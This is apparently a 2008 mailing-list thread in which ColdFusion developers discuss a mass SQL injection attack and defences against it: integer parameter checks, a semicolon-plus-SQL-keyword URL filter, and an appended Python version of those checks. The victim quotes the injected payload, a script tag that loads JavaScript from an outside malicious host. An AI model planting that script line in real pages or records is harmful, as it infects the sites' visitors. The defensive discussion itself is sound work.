Bruce...

Without going into the whole thing, the script runs in your database and
selects against the systables and syscolumns tables. It then loops over
these and performs updates on existing records.

You really need to go back and read the entire thread from 3 weeks ago.

http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065

It has everything you'd need to know about what this attack does, how to
reverse the results, and lastly how to prevent it from happening again.


andy
   

-----Original Message-----
From: Bruce Schuman [mailto:[EMAIL PROTECTED] 
Sent: Thursday, August 07, 2008 11:17 AM
To: CF-Talk
Subject: RE: HELP! SQL Injection Attack!

>  The attack appends JavaScript to character fields.


Hi.  Just checking in here on SQL injection -- I am a self-taught
self-employed CF programmer, been doing this for quite a while, but there is
a ton I don't know.  And I have been hit by this current wave of injection

So, my SQL Server 2005 database doesn't just get one record injected.  It's
every record in a particular field, all containing (in this attack) this
code

script src="http://jjmaoduo.3322.org/csrss/w.js";

and a few more things in html I didn't include



What I have done to protect about 15 CF sites -- is simply require that
integer values be integers -- by cfincluding a list of params like this,
from application.cfm:

><CFIF IsDefined("groupid")> <CFPARAM NAME="groupid" TYPE="integer"> </CFIF>
><CFIF IsDefined("login")> <CFPARAM NAME="login" TYPE="integer"> </CFIF>
><CFIF IsDefined("sg")> <CFPARAM NAME="sg" TYPE="integer"> </CFIF>
><CFIF IsDefined("messageid")> <CFPARAM NAME="messageid" TYPE="integer"> </CFIF>
><CFIF IsDefined("msg")> <CFPARAM NAME="msg" TYPE="integer"> </CFIF>


So, this text script has been injected into every record in about five
fields in my users table -- and also into a variety of other tables in the
same way: every record in that table, in some selected fields.

All these injected fields are text fields -- URLs, addresses,

Can this be done through a URL?

Does the list of fields that have been injected provide any clue about how
or where the injection attack occurred?  How do these guys, or their
program, know my table names and my field names?  I have some very obscure
field names, and they still get them injected - they are not guessing these
things, they know the name of the field.

If I wanted to duplicate what they did, I would write a loop that would go
through every record in the table, and CFUPDATE that particular record.  In
fact, I wrote scripts like this to remove this junk, setting the record back
to what it was before the injection.  How do they do this?



Anyway, got my hands full.  Any thoughts on this would be great.

And yes, I'd like to see the URL "loop" script that was offered by Justin
Scott

>Actually, with this particular SQL injection attack it's really easy to 
>stop.  We created a SQL filter that is called from application.cfm.  It 
>loops through the URL structure and checks to see if any URL variables 
>contain both a semi-colon and any SQL keyword.  If a match is found, it 
>just cfaborts the request and sends us an e-mail with the details.  We 
>periodically review those messages and have not found a single 
>false-positive yet after deployment to every site we manage.  Granted, 
>it will not stop SQL injection through form posts, but I don't recall 
>ever seeing a SQL injection attack through a form post (yet).  At the 
>least it can put an immediate stop to the current flood and give you 
>time to implement other protective measures such as cfqueryparam, etc.  
>We have CF5 and CFMX versions if anyone wants a copy.

Bruce Schuman
Santa Barbara CA
http://originresearch.com
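The two request-side checks described in this thread, Bruce's "integers must be integers" parameter list and Justin Scott's "semicolon plus a SQL keyword" filter, as an added Python example that is not code from the thread. The parameter names come from Bruce's application.cfm list; the SQL keyword set and the decision to check form fields as well as URL variables are assumptions, not Justin's filter.

```python
import re
from urllib.parse import unquote_plus

# Parameters Bruce forces to be integers via CFPARAM TYPE="integer" (names from his list).
INTEGER_PARAMS = {"groupid", "login", "sg", "messageid", "msg"}

# Keywords to pair with a semicolon. Justin's exact list is not in the thread; this
# set is an assumption. Short English words such as SET are deliberately left out
# to keep the false-positive rate low.
SQL_KEYWORDS = ("declare", "cast", "exec", "select", "insert", "update", "delete", "drop", "alter")
KEYWORD_RE = re.compile(r"\b(" + "|".join(SQL_KEYWORDS) + r")\b", re.IGNORECASE)


def parse_query(qs):
    """Split a raw query string into decoded (name, value) pairs.

    Written by hand rather than with urllib.parse.parse_qsl so that a literal or
    percent-encoded ';' inside a value is never treated as a pair separator.
    """
    pairs = []
    for part in qs.split("&"):
        if not part:
            continue
        name, _, value = part.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def check_params(params):
    """Return (name, reason) for every parameter that should abort the request.

    Takes any iterable of (name, value) pairs, so the same check can run over
    FORM fields, which Justin notes his URL-only filter does not cover.
    """
    problems = []
    for name, value in params:
        if name.lower() in INTEGER_PARAMS:
            if not re.fullmatch(r"-?\d+", value.strip()):
                problems.append((name, "expected integer"))
        elif ";" in value and KEYWORD_RE.search(value):
            problems.append((name, "semicolon with SQL keyword"))
    return problems


def check_query_string(qs):
    """Decode a raw query string, then apply check_params to it."""
    return check_params(parse_query(qs))
```

A hit would be the point at which Justin's filter cfaborts and sends the alert e-mail; the integer checks reject the value outright, the way a failed CFPARAM TYPE="integer" does.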






Archive: 
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310391